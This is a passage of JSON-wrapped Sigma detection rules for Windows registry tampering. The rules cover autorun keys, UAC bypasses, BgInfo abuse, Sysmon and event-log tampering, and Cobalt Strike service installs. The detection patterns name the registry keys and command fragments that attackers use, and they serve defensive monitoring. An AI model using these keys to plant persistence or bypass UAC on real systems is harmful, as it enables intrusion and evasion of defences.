    "content": "title: Wow6432Node Classes Autorun Keys Modification\nid: 18f2065c-d36c-464a-a748-bcf909acb2e3\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    wow_classes_base:\n        TargetObject|contains: '\\Software\\Wow6432Node\\Classes'\n    wow_classes:\n        TargetObject|contains:\n            - '\\Folder\\ShellEx\\ExtShellFolderViews'\n            - '\\Folder\\ShellEx\\DragDropHandlers'\n            - '\\Folder\\ShellEx\\ColumnHandlers'\n            - '\\Directory\\Shellex\\DragDropHandlers'\n            - '\\Directory\\Shellex\\CopyHookHandlers'\n            - '\\CLSID\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\Instance'\n            - '\\CLSID\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\Instance'\n            - '\\CLSID\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\Instance'\n            - '\\CLSID\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\Instance'\n            - '\\AllFileSystemObjects\\ShellEx\\DragDropHandlers'\n            - '\\ShellEx\\PropertySheetHandlers'\n            - '\\ShellEx\\ContextMenuHandlers'\n    filter:\n        Details: '(Empty)'\n    condition: wow_classes_base and wow_classes and not filter\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml",
    "content": "title: Wow6432Node Windows NT CurrentVersion Autorun Keys Modification\nid: 480421f9-417f-4d3b-9552-fd2728443ec8\nrelated:\n    - id: 17f878b8-9968-4578-b814-c4217fc5768c\n      type: obsolete\nstatus: test\ndescription: Detects modification of autostart extensibility point (ASEP) in registry.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\n    - https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns\n    - https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d # a list with registry keys\nauthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)\ndate: 2019-10-25\nmodified: 2025-10-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_wow_nt_current_version_base:\n        TargetObject|contains: '\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion'\n    selection_wow_nt_current_version:\n        TargetObject|contains:\n            - '\\Windows\\Appinit_Dlls'\n            - '\\Image File Execution Options'\n            - '\\Drivers32'\n    filter_main_empty:\n        Details: '(Empty)'\n    filter_main_null:\n        Details: null\n    filter_main_file_exec_options:\n        Details|endswith: '\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options'\n    condition: all of selection_* and not 1 of filter_main_*\nfalsepositives:\n    - Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason\n    - Legitimate administrator sets up autorun keys for legitimate reason\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_bginfo_custom_db.yml",
    "content": "title: New BgInfo.EXE Custom DB Path Registry Configuration\nid: 53330955-dc52-487f-a3a2-da24dcff99b5\nstatus: test\ndescription: Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-16\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Software\\Winternals\\BGInfo\\Database'\n    condition: selection\nfalsepositives:\n    - Legitimate use of external DB to save the results\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_bginfo_custom_vbscript.yml",
    "content": "title: New BgInfo.EXE Custom VBScript Registry Configuration\nid: 992dd79f-dde8-4bb0-9085-6350ba97cfb3\nrelated:\n    - id: cd277474-5c52-4423-a52b-ac2d7969902f\n      type: similar\nstatus: test\ndescription: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom VBScript via \"BgInfo.exe\"\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-16\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Software\\Winternals\\BGInfo\\UserFields\\'\n        Details|startswith: '4' # WMI\n    condition: selection\nfalsepositives:\n    - Legitimate VBScript\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml",
    "content": "title: New BgInfo.EXE Custom WMI Query Registry Configuration\nid: cd277474-5c52-4423-a52b-ac2d7969902f\nrelated:\n    - id: 992dd79f-dde8-4bb0-9085-6350ba97cfb3\n      type: similar\nstatus: test\ndescription: Detects setting of a new registry value related to BgInfo configuration, which can be abused to execute custom WMI query via \"BgInfo.exe\"\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-16\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Software\\Winternals\\BGInfo\\UserFields\\'\n        Details|startswith: '6' # WMI\n    condition: selection\nfalsepositives:\n    - Legitimate WMI query\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute.yml",
    "content": "title: Bypass UAC Using DelegateExecute\nid: 46dd5308-4572-4d12-aa43-8938f0184d4f\nstatus: test\ndescription: Bypasses User Account Control using a fileless method\nreferences:\n    - https://learn.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand\n    - https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute\nauthor: frack113\ndate: 2022-01-05\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\open\\command\\DelegateExecute'\n        Details: (Empty)\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_delegateexecute/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Bypass UAC using sdclt DelegateExecute\n      technique: T1548.002\n      atomic_guid: 3be891eb-4608-4173-87e8-78b494c029b7\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer.yml",
    "content": "title: Bypass UAC Using Event Viewer\nid: 674202d0-b22a-4af4-ae5f-2eda1f3da1af\nstatus: test\ndescription: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification\nreferences:\n    - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd\nauthor: frack113\ndate: 2022-01-05\nmodified: 2023-08-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.010\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '_Classes\\mscfile\\shell\\open\\command\\(Default)'\n    filter:\n        Details|startswith: '%SystemRoot%\\system32\\mmc.exe \"%1\" %'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_eventviewer/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Bypass UAC using Event Viewer (cmd)\n      technique: T1548.002\n      atomic_guid: 5073adf8-9a50-4bd9-b298-a9bd2ead8af9\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task.yml",
    "content": "title: Bypass UAC Using SilentCleanup Task\nid: 724ea201-6514-4f38-9739-e5973c34f49a\nstatus: test\ndescription: |\n    Detects the setting of the environement variable \"windir\" to a non default value.\n    Attackers often abuse this variable in order to trigger a UAC bypass via the \"SilentCleanup\" task.\n    The SilentCleanup task located in %windir%\\system32\\cleanmgr.exe is an auto-elevated task that can be abused to elevate any file with administrator privileges without prompting UAC.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task\n    - https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/\n    - https://www.fortinet.com/blog/threat-research/enter-the-darkgate-new-cryptocurrency-mining-and-ransomware-campaign\nauthor: frack113, Nextron Systems\ndate: 2022-01-06\nmodified: 2024-01-30\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Environment\\windir'\n    filter_main_default:\n        Details: '%SystemRoot%'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_bypass_uac_using_silentcleanup_task/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Bypass UAC using SilentCleanup Task\n      technique: T1548.002\n      atomic_guid: 28104f8a-4ff1-4582-bcf6-699dce156608\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_change_rdp_port.yml",
    "content": "title: Default RDP Port Changed to Non Standard Port\nid: 509e84b9-a71a-40e0-834f-05470369bd1e\nstatus: test\ndescription: |\n    Detects changes to the default RDP port.\n    Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface.\n    Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md\nauthor: frack113\ndate: 2022-01-01\nmodified: 2024-03-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.t1547.010\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|endswith: '\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\PortNumber'\n    filter_main_port:\n        Details: DWORD (0x00000d3d) # 3389\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_change_rdp_port/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Changing RDP Port to Non Standard Port via Powershell\n      technique: T1021.001\n      atomic_guid: 2f840dd4-8a2e-4f44-beb3-6b2399ea3771\n    - type: atomic-red-team\n      name: Changing RDP Port to Non Standard Port via Command_Prompt\n      technique: T1021.001\n      atomic_guid: 74ace21e-a31c-4f7d-b540-53e4eb6d1f73\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_change_security_zones.yml",
    "content": "title: IE Change Domain Zone\nid: 45e112d0-7759-4c2a-aa36-9f8fb79d3393\nrelated:\n    - id: d88d0ab2-e696-4d40-a2ed-9790064e66b3\n      type: derived\nstatus: test\ndescription: Hides the file extension through modification of the registry\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone\n    - https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries\nauthor: frack113\ndate: 2022-01-22\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.t1137\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_domains:\n        TargetObject|contains: \\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\\n    filter:\n        Details:\n            - DWORD (0x00000000) # My Computer\n            - DWORD (0x00000001) # Local Intranet Zone\n            - '(Empty)'\n    condition: selection_domains and not filter\nfalsepositives:\n    - Administrative scripts\nlevel: medium\nregression_tests_path: regression_data/rules/windows/registry/registry_set/registry_set_change_security_zones/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Add Domain to Trusted Sites Zone\n      technique: T1112\n      atomic_guid: cf447677-5a4e-4937-a82c-e47d254afd57\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml",
    "content": "title: Sysmon Driver Altitude Change\nid: 4916a35e-bfc4-47d0-8e25-a003d7067061\nstatus: test\ndescription: |\n    Detects changes in Sysmon driver altitude value.\n    If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.\nreferences:\n    - https://posts.specterops.io/shhmon-silencing-sysmon-via-driver-unload-682b5be57650\n    - https://youtu.be/zSihR3lTf7g\nauthor: B.Talebi\ndate: 2022-07-28\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Services\\'\n        TargetObject|endswith: '\\Instances\\Sysmon Instance\\Altitude'\n    condition: selection\nfalsepositives:\n    - Legitimate driver altitude change to hide sysmon\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_change_winevt_channelaccess.yml",
    "content": "title: Change Winevt Channel Access Permission Via Registry\nid: 7d9263bd-dc47-4a58-bc92-5474abab390c\nstatus: test\ndescription: Detects tampering with the \"ChannelAccess\" registry key in order to change access to Windows event channel.\nreferences:\n    - https://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/\n    - https://learn.microsoft.com/en-us/windows/win32/api/winevt/\n    - https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/\nauthor: frack113\ndate: 2022-09-17\nmodified: 2024-03-25\ntags:\n    - attack.defense-evasion\n    - attack.t1562.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\'\n        TargetObject|endswith: '\\ChannelAccess'\n        # Add more interesting combinations if you found them\n        Details|contains:\n            - '(A;;0x1;;;LA)' # Local administrator having GENERIC ALL\n            - '(A;;0x1;;;SY)' # Local System having GENERIC ALL\n            - '(A;;0x5;;;BA)' # Built-in administrators having GENERIC ALL and  GENERIC WRITE\n    filter_main_trustedinstaller:\n        Image: 'C:\\Windows\\servicing\\TrustedInstaller.exe'\n    filter_main_tiworker:\n        Image|startswith: 'C:\\Windows\\WinSxS\\'\n        Image|endswith: '\\TiWorker.exe'\n    condition: selection and not 1 of filter_main_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_chrome_extension.yml",
    "content": "title: Running Chrome VPN Extensions via the Registry 2 VPN Extension\nid: b64a026b-8deb-4c1d-92fd-98893209dff1\nstatus: test\ndescription: Running Chrome VPN Extensions via the Registry install 2 vpn extension\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension\nauthor: frack113\ndate: 2021-12-28\nmodified: 2023-08-17\ntags:\n    - attack.initial-access\n    - attack.persistence\n    - attack.t1133\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    chrome_ext:\n        TargetObject|contains: 'Software\\Wow6432Node\\Google\\Chrome\\Extensions'\n        TargetObject|endswith: 'update_url'\n    chrome_vpn:\n        TargetObject|contains:\n            - fdcgdnkidjaadafnichfpabhfomcebme # ZenMate VPN\n            - fcfhplploccackoneaefokcmbjfbkenj # 1clickVPN\n            - bihmplhobchoageeokmgbdihknkjbknd # Touch VPN\n            - gkojfkhlekighikafcpjkiklfbnlmeio # Hola Free VPN\n            - jajilbjjinjmgcibalaakngmkilboobh # Astar VPN\n            - gjknjjomckknofjidppipffbpoekiipm # VPN Free\n            - nabbmpekekjknlbkgpodfndbodhijjem # Earth VPN\n            - kpiecbcckbofpmkkkdibbllpinceiihk # DotVPN\n            - nlbejmccbhkncgokjcmghpfloaajcffj # Hotspot Shield Free VPN\n            - omghfjlpggmjjaagoclmmobgdodcjboh # Browsec VPN\n            - bibjcjfmgapbfoljiojpipaooddpkpai # VPN-free.pro\n            - mpcaainmfjjigeicjnlkdfajbioopjko # VPN Unlimited Free\n            - jljopmgdobloagejpohpldgkiellmfnc # PP VPN\n            - lochiccbgeohimldjooaakjllnafhaid # IP Unblock\n            - nhnfcgpcbfclhfafjlooihdfghaeinfc # Surf VPN\n            - ookhnhpkphagefgdiemllfajmkdkcaim # iNinja VPN\n            - namfblliamklmeodpcelkokjbffgmeoo # Daily VPN\n            - nbcojefnccbanplpoffopkoepjmhgdgh # Hoxx VPN Proxy\n            - majdfhpaihoncoakbjgbdhglocklcgno # Free VPN\n            - lnfdmdhmfbimhhpaeocncdlhiodoblbd # VPN PROXY MASTER\n            - eppiocemhmnlbhjplcgkofciiegomcon # Urban Free VPN\n            - cocfojppfigjeefejbpfmedgjbpchcng # SaferVPN Proxy\n            - foiopecknacmiihiocgdjgbjokkpkohc # VPN Professional\n            - hhdobjgopfphlmjbmnpglhfcgppchgje # AdGuard VPN\n            - jgbaghohigdbgbolncodkdlpenhcmcge # Free VPN\n            - inligpkjkhbpifecbdjhmdpcfhnlelja # Free One Touch VPN\n            - higioemojdadgdbhbbbkfbebbdlfjbip # Unlimited VPN & Proxy by ibVPN\n            - hipncndjamdcmphkgngojegjblibadbe # RusVPN\n            - iolonopooapdagdemdoaihahlfkncfgg # Azino VPN\n            - nhfjkakglbnnpkpldhjmpmmfefifedcj # Pron VPN\n            - jpgljfpmoofbmlieejglhonfofmahini # Free Residential VPN\n            - fgddmllnllkalaagkghckoinaemmogpe # ExpressVPN\n            - ejkaocphofnobjdedneohbbiilggdlbi # Hotspot Shield Elite VPN Proxy\n            - keodbianoliadkoelloecbhllnpiocoi # Hide My IP VPN\n            - hoapmlpnmpaehilehggglehfdlnoegck # Tunnello VPN\n            - poeojclicodamonabcabmapamjkkmnnk # HMA VPN Proxy Unblocker\n            - dfkdflfgjdajbhocmfjolpjbebdkcjog # Free Avira Phantom VPN\n            - kcdahmgmaagjhocpipbodaokikjkampi # Hola VPN\n            - klnkiajpmpkkkgpgbogmcgfjhdoljacg # Free VPN for Chrome\n            - lneaocagcijjdpkcabeanfpdbmapcjjg # Hub VPN\n            - pgfpignfckbloagkfnamnolkeaecfgfh # Free Proxy VPN\n            - jplnlifepflhkbkgonidnobkakhmpnmh # Private Internet Access\n            - jliodmnojccaloajphkingdnpljdhdok # Turbo VPN for PC\n            - hnmpcagpplmpfojmgmnngilcnanddlhb # Windscribe\n            - ffbkglfijbcbgblgflchnbphjdllaogb # CyberGhost VPN\n            - kcndmbbelllkmioekdagahekgimemejo # VPN.AC\n            - jdgilggpfmjpbodmhndmhojklgfdlhob # Browser VPN\n            - bihhflimonbpcfagfadcnbbdngpopnjb # DEEPRISM VPN\n            - ppajinakbfocjfnijggfndbdmjggcmde # My Browser Vpn\n            - oofgbpoabipfcfjapgnbbjjaenockbdp # SetupVPN\n            - bhnhkdgoefpmekcgnccpnhjfdgicfebm # Wachee VPN\n            - knmmpciebaoojcpjjoeonlcjacjopcpf # Thunder Proxy\n            - dhadilbmmjiooceioladdphemaliiobo # Free Proxy VPN\n            - jedieiamjmoflcknjdjhpieklepfglin # FastestVPN Proxy\n            - mhngpdlhojliikfknhfaglpnddniijfh # WorkingVPN\n            - omdakjcmkglenbhjadbccaookpfjihpa # TunnelBear VPN\n            - npgimkapccfidfkfoklhpkgmhgfejhbj # BelkaVPN\n            - akeehkgglkmpapdnanoochpfmeghfdln # VPN Master\n            - gbmdmipapolaohpinhblmcnpmmlgfgje # Unblock Websites\n            - aigmfoeogfnljhnofglledbhhfegannp # Lethean Proxy VPN\n            - cgojmfochfikphincbhokimmmjenhhgk # Whoer VPN\n            - ficajfeojakddincjafebjmfiefcmanc # Best VPN USA\n            - ifnaibldjfdmaipaddffmgcmekjhiloa # FREE VPN DEWELOPMENT\n            - jbnmpdkcfkochpanomnkhnafobppmccn # apkfold free vpn\n            - apcfdffemoinopelidncddjbhkiblecc # Soul VPN\n            - mjolnodfokkkaichkcjipfgblbfgojpa # DotVPN\n            - oifjbnnafapeiknapihcmpeodaeblbkn # rderzh VPN Proxy\n            - plpmggfglncceinmilojdkiijhmajkjh # Red Panda VPN\n            - mjnbclmflcpookeapghfhapeffmpodij # Ultrareach VPN\n            - bblcccknbdbplgmdjnnikffefhdlobhp # FastStunnel VPN\n            - aojlhgbkmkahabcmcpifbolnoichfeep # VirtualShield VPN\n            - lcmammnjlbmlbcaniggmlejfjpjagiia # Adblock Office VPN Proxy Server\n            - knajdeaocbpmfghhmijicidfcmdgbdpm # Guru VPN & Proxy\n            - bdlcnpceagnkjnjlbbbcepohejbheilk # Malus VPN\n            - edknjdjielmpdlnllkdmaghlbpnmjmgb # Muscle VPN\n            - eidnihaadmmancegllknfbliaijfmkgo # Push VPN\n            - ckiahbcmlmkpfiijecbpflfahoimklke # Gom VPN\n            - macdlemfnignjhclfcfichcdhiomgjjb # Free Fast VPN\n            - chioafkonnhbpajpengbalkececleldf # BullVPN\n            - amnoibeflfphhplmckdbiajkjaoomgnj # HideAll VPN\n            - llbhddikeonkpbhpncnhialfbpnilcnc # ProxyFlow\n            - pcienlhnoficegnepejpfiklggkioccm # Cloud VPN\n            - iocnglnmfkgfedpcemdflhkchokkfeii # sVPN\n            - igahhbkcppaollcjeaaoapkijbnphfhb # Social VPN\n            - njpmifchgidinihmijhcfpbdmglecdlb # Trellonet Trellonet\n            - ggackgngljinccllcmbgnpgpllcjepgc # WindmillVPN\n            - kchocjcihdgkoplngjemhpplmmloanja # IPBurger Proxy & VPN\n            - bnijmipndnicefcdbhgcjoognndbgkep # Veee\n            - lklekjodgannjcccdlbicoamibgbdnmi # Anonymous Proxy Vpn Browser\n            - dbdbnchagbkhknegmhgikkleoogjcfge # Hideman VPN\n            - egblhcjfjmbjajhjhpmnlekffgaemgfh # Fornex VPN\n            - ehbhfpfdkmhcpaehaooegfdflljcnfec # WeVPN\n            - bkkgdjpomdnfemhhkalfkogckjdkcjkg # VPNMatic\n            - almalgbpmcfpdaopimbdchdliminoign # Urban Shield\n            - akkbkhnikoeojlhiiomohpdnkhbkhieh # Prime VPN\n            - gbfgfbopcfokdpkdigfmoeaajfmpkbnh # westwind\n            - bniikohfmajhdcffljgfeiklcbgffppl # Upnet\n            - lejgfmmlngaigdmmikblappdafcmkndb # uVPN\n            - ffhhkmlgedgcliajaedapkdfigdobcif # Nucleus VPN\n            - gcknhkkoolaabfmlnjonogaaifnjlfnp # FoxyProxy Standard\n            - pooljnboifbodgifngpppfklhifechoe # GeoProxy\n            - fjoaledfpmneenckfbpdfhkmimnjocfa # NordVPN\n            - aakchaleigkohafkfjfjbblobjifikek # ProxFlow\n            - dpplabbmogkhghncfbfdeeokoefdjegm # Proxy SwitchySharp\n            - padekgcemlokbadohgkifijomclgjgif # Proxy SwitchyOmega\n            - bfidboloedlamgdmenmlbipfnccokknp # PureVPN\n    condition: all of chrome_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_clickonce_trust_prompt.yml",
    "content": "title: ClickOnce Trust Prompt Tampering\nid: ac9159cc-c364-4304-8f0a-d63fc1a0aabb\nstatus: test\ndescription: Detects changes to the ClickOnce trust prompt registry key in order to enable an installation from different locations such as the Internet.\nreferences:\n    - https://posts.specterops.io/less-smartscreen-more-caffeine-ab-using-clickonce-for-trusted-code-execution-1446ea8051c5\n    - https://learn.microsoft.com/en-us/visualstudio/deployment/how-to-configure-the-clickonce-trust-prompt-behavior\nauthor: '@SerkinValery, Nasreddine Bencherchali (Nextron Systems)'\ndate: 2023-06-12\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\SOFTWARE\\MICROSOFT\\.NETFramework\\Security\\TrustManager\\PromptingLevel\\'\n        TargetObject|endswith:\n            - '\\Internet'\n            - '\\LocalIntranet'\n            - '\\MyComputer'\n            - '\\TrustedSites'\n            - '\\UntrustedSites'\n        Details: 'Enabled'\n    condition: selection\nfalsepositives:\n    - Legitimate internal requirements.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_cobaltstrike_service_installs.yml",
    "content": "title: Potential CobaltStrike Service Installations - Registry\nid: 61a7697c-cb79-42a8-a2ff-5f0cdfae0130\nstatus: test\ndescription: |\n    Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement.\nreferences:\n    - https://www.sans.org/webcasts/tech-tuesday-workshop-cobalt-strike-detection-log-analysis-119395\nauthor: Wojciech Lesicki\ndate: 2021-06-29\nmodified: 2024-03-25\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.lateral-movement\n    - attack.t1021.002\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection_key:\n        - TargetObject|contains: '\\System\\CurrentControlSet\\Services'\n        - TargetObject|contains|all:\n              - '\\System\\ControlSet'\n              - '\\Services'\n    selection_details:\n        - Details|contains|all:\n              - 'ADMIN$'\n              - '.exe'\n        - Details|contains|all:\n              - '%COMSPEC%'\n              - 'start'\n              - 'powershell'\n    condition: all of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_comhijack_sdclt.yml",
    "content": "title: COM Hijack via Sdclt\nid: 07743f65-7ec9-404a-a519-913db7118a8d\nstatus: test\ndescription: Detects changes to 'HKCU\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'\nreferences:\n    - http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass\n    - https://www.exploit-db.com/exploits/47696\nauthor: Omkar Gudhate\ndate: 2020-09-27\nmodified: 2023-09-28\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1546\n    - attack.t1548\nlogsource:\n    category: registry_set\n    product: windows\ndetection:\n    selection:\n        TargetObject|contains: '\\Software\\Classes\\Folder\\shell\\open\\command\\DelegateExecute'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_crashdump_disabled.yml",
    "content": "title: CrashControl CrashDump Disabled\nid: 2ff692c2-4594-41ec-8fcb-46587de769e0\nstatus: test\ndescription: Detects disabling the CrashDump per registry (as used by HermeticWiper)\nreferences:\n    - https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/\nauthor: Tobias Michalski (Nextron Systems)\ndate: 2022-02-24\nmodified: 2023-08-17\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1564\n    - attack.t1112\nlogsource:\n    product: windows\n    category: registry_set\ndetection:\n    selection:\n        TargetObject|contains: 'SYSTEM\\CurrentControlSet\\Control\\CrashControl'\n        Details: 'DWORD (0x00000000)'\n    condition: selection\nfalsepositives:\n    - Legitimate disabling of crashdumps\nlevel: medium\n"
  },
  {
    "path": "rules/windows/registry/registry_set/registry_set_create_minint_key.yml",
    "content": "title: Security Event Logging Disabled via MiniNt Registry Key - Registry Set\nid: 8839e550-52d7-4958-9f2f-e13c1e736838\nrelated:\n    - id: 1a4bd6af-99ac-4466-b5b2-7b72b4a05462 # Security Event Logging Disabled Via MiniNt Registry Key\n      type: similar\nstatus: experimental\ndescription: |\n    Detects the addition of the 'MiniNt' key to the registry. Upon a reboot, Windows Event Log service will stop writing events.\n    Windows Event Log is a service that collects and stores event logs from the operating system and applications. It is an important component of Windows security and auditing.\n    Adversary may want to disable this service to disable logging of security events which could be used to detect their activities.\nreferences:\n    - https://www.hackingarticles.in/defense-evasion-windows-event-logging-t1562-002/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-04-09\ntags:\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.t1562.002\n    - attack.t1112\n    - 